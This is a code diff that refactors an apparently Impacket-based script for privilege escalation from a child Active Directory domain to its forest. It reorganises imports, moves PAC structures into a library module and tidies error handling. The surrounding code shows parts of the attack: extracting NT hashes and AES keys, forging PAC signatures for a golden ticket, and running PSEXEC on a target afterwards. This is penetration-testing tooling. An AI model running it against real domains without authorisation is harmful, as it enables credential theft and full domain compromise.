@@ -50,15 +50,20 @@
 #
 #
 
+import argparse
+import datetime
+import logging
 import random
 import string
-import logging
-import datetime
+import sys
+import os
+import cmd
+import time
+from threading import Thread, Lock
 from binascii import unhexlify, hexlify
 from socket import gethostbyname
 from struct import unpack
-import argparse
-import sys
+
 try:
     import pyasn1
 except ImportError:
@@ -74,251 +79,28 @@ from impacket.krb5.crypto import Key, _enctype_table, _checksum_table, Enctype
 from impacket.dcerpc.v5.ndr import NDRULONG
 from impacket.dcerpc.v5.samr import NULL, GROUP_MEMBERSHIP, SE_GROUP_MANDATORY, SE_GROUP_ENABLED_BY_DEFAULT, SE_GROUP_ENABLED
 from pyasn1.codec.der import decoder, encoder
+from pyasn1.type.univ import noValue
 from impacket.examples import logger
 from impacket.ntlm import LMOWFv1, NTOWFv1
-from impacket.dcerpc.v5.ndr import NDRSTRUCT, NDRUniConformantArray, NDRPOINTER
-from impacket.dcerpc.v5.dtypes import ULONG, RPC_SID, RPC_UNICODE_STRING, FILETIME, PRPC_SID, USHORT, MAXIMUM_ALLOWED
-from impacket.dcerpc.v5.nrpc import USER_SESSION_KEY, CHAR_FIXED_8_ARRAY, PUCHAR_ARRAY, PRPC_UNICODE_STRING_ARRAY
-from impacket.dcerpc.v5.rpcrt import TypeSerialization1, RPC_C_AUTHN_LEVEL_PKT_PRIVACY, RPC_C_AUTHN_GSS_NEGOTIATE
+from impacket.dcerpc.v5.dtypes import RPC_SID, MAXIMUM_ALLOWED
+from impacket.dcerpc.v5.rpcrt import RPC_C_AUTHN_LEVEL_PKT_PRIVACY, RPC_C_AUTHN_GSS_NEGOTIATE
 from impacket.dcerpc.v5.nrpc import MSRPC_UUID_NRPC, hDsrGetDcNameEx
 from impacket.dcerpc.v5.lsat import MSRPC_UUID_LSAT, hLsarOpenPolicy2, POLICY_LOOKUP_NAMES, LSAP_LOOKUP_LEVEL, hLsarLookupSids
 from impacket.dcerpc.v5.lsad import hLsarQueryInformationPolicy2, POLICY_INFORMATION_CLASS
+from impacket.krb5.pac import KERB_SID_AND_ATTRIBUTES, PAC_SIGNATURE_DATA, PAC_INFO_BUFFER, PAC_LOGON_INFO, \
+    PAC_CLIENT_INFO_TYPE, PAC_SERVER_CHECKSUM, \
+    PAC_PRIVSVR_CHECKSUM, PACTYPE, PKERB_SID_AND_ATTRIBUTES_ARRAY, VALIDATION_INFO
 from impacket.dcerpc.v5 import transport, drsuapi, epm, samr
-from impacket.structure import Structure
 from impacket.smbconnection import SessionError
 from impacket.nt_errors import STATUS_NO_LOGON_SERVERS
-
-################################################################################
-# CONSTANTS
-################################################################################
-# From http://msdn.microsoft.com/en-us/library/aa302203.aspx#msdn_pac_credentials
-# and http://diswww.mit.edu/menelaus.mit.edu/cvs-krb5/25862
-PAC_LOGON_INFO       = 1
-PAC_CREDENTIALS_INFO = 2
-PAC_SERVER_CHECKSUM  = 6
-PAC_PRIVSVR_CHECKSUM = 7
-PAC_CLIENT_INFO_TYPE = 10
-PAC_DELEGATION_INFO  = 11
-PAC_UPN_DNS_INFO     = 12
-
-################################################################################
-# STRUCTURES
-################################################################################
-
-PISID = PRPC_SID
-
-# 2.2.1 KERB_SID_AND_ATTRIBUTES
-class KERB_SID_AND_ATTRIBUTES(NDRSTRUCT):
-    structure = (
-        ('Sid', PISID),
-        ('Attributes', ULONG),
-    )
-
-class KERB_SID_AND_ATTRIBUTES_ARRAY(NDRUniConformantArray):
-    item = KERB_SID_AND_ATTRIBUTES
-
-class PKERB_SID_AND_ATTRIBUTES_ARRAY(NDRPOINTER):
-    referent = (
-        ('Data', KERB_SID_AND_ATTRIBUTES_ARRAY),
-    )
-
-# 2.2.2 GROUP_MEMBERSHIP
-from impacket.dcerpc.v5.nrpc import PGROUP_MEMBERSHIP_ARRAY
-
-# 2.2.3 DOMAIN_GROUP_MEMBERSHIP
-class DOMAIN_GROUP_MEMBERSHIP(NDRSTRUCT):
-    structure = (
-        ('DomainId', PISID),
-        ('GroupCount', ULONG),
-        ('GroupIds', PGROUP_MEMBERSHIP_ARRAY),
-    )
-
-class DOMAIN_GROUP_MEMBERSHIP_ARRAY(NDRUniConformantArray):
-    item = DOMAIN_GROUP_MEMBERSHIP
-
-class PDOMAIN_GROUP_MEMBERSHIP_ARRAY(NDRPOINTER):
-    referent = (
-        ('Data', KERB_SID_AND_ATTRIBUTES_ARRAY),
-    )
-
-# 2.3 PACTYPE
-class PACTYPE(Structure):
-    structure = (
-        ('cBuffers', '<L=0'),
-        ('Version', '<L=0'),
-        ('Buffers', ':'), 
-    )
-
-# 2.4 PAC_INFO_BUFFER
-class PAC_INFO_BUFFER(Structure):
-    structure = (
-        ('ulType', '<L=0'),
-        ('cbBufferSize', '<L=0'),
-        ('Offset', '<Q=0'), 
-    )
-
-# 2.5 KERB_VALIDATION_INFO
-class KERB_VALIDATION_INFO(NDRSTRUCT):
-    structure = (
-        ('LogonTime', FILETIME),
-        ('LogoffTime', FILETIME),
-        ('KickOffTime', FILETIME),
-        ('PasswordLastSet', FILETIME),
-        ('PasswordCanChange', FILETIME),
-        ('PasswordMustChange', FILETIME),
-        ('EffectiveName', RPC_UNICODE_STRING),
-        ('FullName', RPC_UNICODE_STRING),
-        ('LogonScript', RPC_UNICODE_STRING),
-        ('ProfilePath', RPC_UNICODE_STRING),
-        ('HomeDirectory', RPC_UNICODE_STRING),
-        ('HomeDirectoryDrive', RPC_UNICODE_STRING),
-        ('LogonCount', USHORT),
-        ('BadPasswordCount', USHORT),
-        ('UserId', ULONG),
-        ('PrimaryGroupId', ULONG),
-        ('GroupCount', ULONG),
-        ('GroupIds', PGROUP_MEMBERSHIP_ARRAY),
-        ('UserFlags', ULONG),
-        ('UserSessionKey', USER_SESSION_KEY),
-        ('LogonServer', RPC_UNICODE_STRING),
-        ('LogonDomainName', RPC_UNICODE_STRING),
-        ('LogonDomainId', PRPC_SID),
-
-        # Also called Reserved1
-        ('LMKey', CHAR_FIXED_8_ARRAY),
-
-        ('UserAccountControl', ULONG),
-        ('SubAuthStatus', ULONG),
-        ('LastSuccessfulILogon', FILETIME),
-        ('LastFailedILogon', FILETIME),
-        ('FailedILogonCount', ULONG),
-        ('Reserved3', ULONG),
-
-        ('SidCount', ULONG),
-        #('ExtraSids', PNETLOGON_SID_AND_ATTRIBUTES_ARRAY),
-        ('ExtraSids', PKERB_SID_AND_ATTRIBUTES_ARRAY),
-        ('ResourceGroupDomainSid', PISID),
-        ('ResourceGroupCount', ULONG),
-        ('ResourceGroupIds', PGROUP_MEMBERSHIP_ARRAY),
-    )
-
-class PKERB_VALIDATION_INFO(NDRPOINTER):
-    referent = (
-        ('Data', KERB_VALIDATION_INFO),
-    )
-
-# 2.6.1 PAC_CREDENTIAL_INFO
-class PAC_CREDENTIAL_INFO(Structure):
-    structure = (
-        ('Version', '<L=0'),
-        ('EncryptionType', '<L=0'),
-        ('SerializedData', ':'), 
-    )
-
-# 2.6.3 SECPKG_SUPPLEMENTAL_CRED
-class SECPKG_SUPPLEMENTAL_CRED(NDRSTRUCT):
-    structure = (
-        ('PackageName', RPC_UNICODE_STRING),
-        ('CredentialSize', ULONG),
-        ('Credentials', PUCHAR_ARRAY),
-    )
-
-class SECPKG_SUPPLEMENTAL_CRED_ARRAY(NDRUniConformantArray):
-    item = SECPKG_SUPPLEMENTAL_CRED
-
-# 2.6.2 PAC_CREDENTIAL_DATA
-class PAC_CREDENTIAL_DATA(NDRSTRUCT):
-    structure = (
-        ('CredentialCount', ULONG),
-        ('Credentials', SECPKG_SUPPLEMENTAL_CRED_ARRAY),
-    )
-
-# 2.6.4 NTLM_SUPPLEMENTAL_CREDENTIAL
-class NTLM_SUPPLEMENTAL_CREDENTIAL(NDRSTRUCT):
-    structure = (
-        ('Version', ULONG),
-        ('Flags', ULONG),
-        ('LmPassword', '16s=""'),
-        ('NtPassword', '16s=""'),
-    )
-
-# 2.7 PAC_CLIENT_INFO
-class PAC_CLIENT_INFO(Structure):
-    structure = (
-        ('ClientId', '<Q=0'),
-        ('NameLength', '<H=0'),
-        ('_Name', '_-Name', 'self["NameLength"]'), 
-        ('Name', ':'), 
-    )
-
-# 2.8 PAC_SIGNATURE_DATA
-class PAC_SIGNATURE_DATA(Structure):
-    structure = (
-        ('SignatureType', '<L=0'),
-        ('Signature', ':'),
-    )
-
-# 2.9 Constrained Delegation Information - S4U_DELEGATION_INFO
-class S4U_DELEGATION_INFO(NDRSTRUCT):
-    structure = (
-        ('S4U2proxyTarget', RPC_UNICODE_STRING),
-        ('TransitedListSize', ULONG),
-        ('S4UTransitedServices', PRPC_UNICODE_STRING_ARRAY ),
-    )
-
-# 2.10 UPN_DNS_INFO
-class UPN_DNS_INFO(Structure):
-    structure = (
-        ('UpnLength', '<H=0'),
-        ('UpnOffset', '<H=0'),
-        ('DnsDomainNameLength', '<H=0'),
-        ('DnsDomainNameOffset', '<H=0'),
-        ('Flags', '<L=0'),
-    )
-
-# 2.11 PAC_CLIENT_CLAIMS_INFO
-class PAC_CLIENT_CLAIMS_INFO(Structure):
-    structure = (
-        ('Claims', ':'),
-    )
-
-# 2.12 PAC_DEVICE_INFO
-class PAC_DEVICE_INFO(NDRSTRUCT):
-    structure = (
-        ('UserId', ULONG),
-        ('PrimaryGroupId', ULONG),
-        ('AccountDomainId', PISID ),
-        ('AccountGroupCount', ULONG ),
-        ('AccountGroupIds', PGROUP_MEMBERSHIP_ARRAY ),
-        ('SidCount', ULONG ),
-        ('ExtraSids', PKERB_SID_AND_ATTRIBUTES_ARRAY ),
-        ('DomainGroupCount', ULONG ),
-        ('DomainGroup', PDOMAIN_GROUP_MEMBERSHIP_ARRAY ),
-    )
-
-# 2.13 PAC_DEVICE_CLAIMS_INFO
-class PAC_DEVICE_CLAIMS_INFO(Structure):
-    structure = (
-        ('Claims', ':'),
-    )
-
-class VALIDATION_INFO(TypeSerialization1):
-    structure = (
-        ('Data', PKERB_VALIDATION_INFO),
-    )
+from impacket.smbconnection import SMBConnection, smb
+from impacket.structure import Structure
+from impacket.examples import remcomsvc, serviceinstall
 
 ################################################################################
 # HELPER FUNCTIONS
 ################################################################################
 
-import os
-import cmd
-import time
-from impacket.smbconnection import SMBConnection, smb
-from impacket.structure import Structure
-from threading import Thread, Lock
-from impacket.examples import remcomsvc, serviceinstall
-
 class RemComMessage(Structure):
     structure = (
         ('Command','4096s=""'),
@@ -441,7 +223,8 @@ class PSEXEC:
 
         except SystemExit:
             raise
-        except:
+        except Exception as e:
+            logging.debug(str(e))
             if unInstalled is False:
                 installService.uninstall()
                 if self.__copyFile is not None:
@@ -462,8 +245,7 @@ class PSEXEC:
                 pass
 
         if tries == 0:
-            logging.critical('Pipe not ready, aborting')
-            raise
+            raise Exception('Pipe not ready, aborting')
 
         fid = s.openFile(tid,pipe,accessMask, creationOption = 0x40, fileAttributes = 0x80)
 
@@ -758,8 +540,8 @@ class RAISECHILD:
             s.login('','')
         except Exception, e:
             logging.debug('Error while anonymous logging into %s' % machineIP)
-
-        s.logoff()
+        else:
+            s.logoff()
         return s.getServerName()
 
     @staticmethod
@@ -769,8 +551,8 @@ class RAISECHILD:
             s.login('','')
         except Exception, e:
             logging.debug('Error while anonymous logging into %s' % machineIP)
-
-        s.logoff()
+        else:
+            s.logoff()
         return s.getServerName() + '.' + s.getServerDNSDomainName()
 
     def getParentSidAndAdminName(self, parentDC, creds):
@@ -1044,8 +826,9 @@ class RAISECHILD:
             rid, lmhash, nthash = self.__decryptHash(userRecord, userRecord['pmsgOut']['V6']['PrefixTableSrc']['pPrefixEntry'])
             aesKey = self.__decryptSupplementalInfo(userRecord, userRecord['pmsgOut']['V6']['PrefixTableSrc']['pPrefixEntry'])
         except Exception, e:
-            #import traceback
-            #traceback.print_exc()
+            if logging.getLogger().level == logging.DEBUG:
+                import traceback
+                traceback.print_exc()
             logging.error("Error while processing user!")
             logging.error(str(e))
             raise
@@ -1237,7 +1020,7 @@ class RAISECHILD:
         checkSumFunctionServer = _checksum_table[serverChecksum['SignatureType']]
         if serverChecksum['SignatureType'] == constants.ChecksumTypes.hmac_sha1_96_aes256.value:
             keyServer = Key(Enctype.AES256, unhexlify(aesKey))
-        elif serverChecksum['SignatureType'] == 0xffffff76:
+        elif serverChecksum['SignatureType'] == constants.ChecksumTypes.hmac_md5.value:
             keyServer = Key(Enctype.RC4, unhexlify(ntHash))
         else:
             raise Exception('Invalid Server checksum type 0x%x' % serverChecksum['SignatureType'] )
@@ -1245,7 +1028,7 @@ class RAISECHILD:
         checkSumFunctionPriv= _checksum_table[privSvrChecksum['SignatureType']]
         if privSvrChecksum['SignatureType'] == constants.ChecksumTypes.hmac_sha1_96_aes256.value:
             keyPriv = Key(Enctype.AES256, unhexlify(aesKey))
-        elif privSvrChecksum['SignatureType'] == 0xffffff76:
+        elif privSvrChecksum['SignatureType'] == constants.ChecksumTypes.hmac_md5.value:
             keyPriv = Key(Enctype.RC4, unhexlify(ntHash))
         else:
             raise Exception('Invalid Priv checksum type 0x%x' % serverChecksum['SignatureType'] )
@@ -1257,7 +1040,7 @@ class RAISECHILD:
         pacType['Buffers'] = buffers + buffersTail
 
         authorizationData = AuthorizationData()
-        authorizationData[0] = None
+        authorizationData[0] = noValue
         authorizationData[0]['ad-type'] = int(constants.AuthorizationDataType.AD_WIN2K_PAC.value)
         authorizationData[0]['ad-data'] = str(pacType)
         authorizationData = encoder.encode(authorizationData)
@@ -1425,20 +1208,26 @@ if __name__ == '__main__':
 
     print version.BANNER
 
-    parser = argparse.ArgumentParser(add_help = True, description = "Privilege Escalation from a child domain up to its forest")
+    parser = argparse.ArgumentParser(add_help = True, description = "Privilege Escalation from a child domain up to its "
+                                                                    "forest")
 
     parser.add_argument('target', action='store', help='domain/username[:password]')
     parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')
-    parser.add_argument('-w', action='store',metavar = "pathname",  help='writes the golden ticket in CCache format into the <pathname> file')
-    #parser.add_argument('-dc-ip', action='store',metavar = "ip address",  help='IP Address of the domain controller (needed to get the user''s SID). If ommited it use the domain part (FQDN) specified in the target parameter')
-    parser.add_argument('-target-exec', action='store',metavar = "target address",  help='Target host you want to PSEXEC against once the main attack finished')
+    parser.add_argument('-w', action='store',metavar = "pathname",  help='writes the golden ticket in CCache format '
+                                                                         'into the <pathname> file')
+    #parser.add_argument('-dc-ip', action='store',metavar = "ip address",  help='IP Address of the domain controller (needed to get the user''s SID). If omitted it will use the domain part (FQDN) specified in the target parameter')
+    parser.add_argument('-target-exec', action='store',metavar = "target address",  help='Target host you want to PSEXEC '
+                        'against once the main attack finished')
 
     group = parser.add_argument_group('authentication')
 
     group.add_argument('-hashes', action="store", metavar = "LMHASH:NTHASH", help='NTLM hashes, format is LMHASH:NTHASH')
     group.add_argument('-no-pass', action="store_true", help='don\'t ask for password (useful for -k)')
-    group.add_argument('-k', action="store_true", help='Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the ones specified in the command line')
-    group.add_argument('-aesKey', action="store", metavar = "hex key", help='AES key to use for Kerberos Authentication (128 or 256 bits)')
+    group.add_argument('-k', action="store_true", help='Use Kerberos authentication. Grabs credentials from ccache file '
+                       '(KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the '
+                       'ones specified in the command line')
+    group.add_argument('-aesKey', action="store", metavar = "hex key", help='AES key to use for Kerberos Authentication '
+                                                                            '(128 or 256 bits)')
 
     if len(sys.argv)==1:
         parser.print_help()
@@ -1495,6 +1284,7 @@ if __name__ == '__main__':
         if e.getErrorCode() == STATUS_NO_LOGON_SERVERS:
             logging.info('Try using Kerberos authentication (-k switch). That might help solving the STATUS_NO_LOGON_SERVERS issue')
     except Exception, e:
-        #import traceback
-        #print traceback.print_exc()
+        if logging.getLogger().level == logging.DEBUG:
+            import traceback
+            traceback.print_exc()
         logging.critical(str(e))
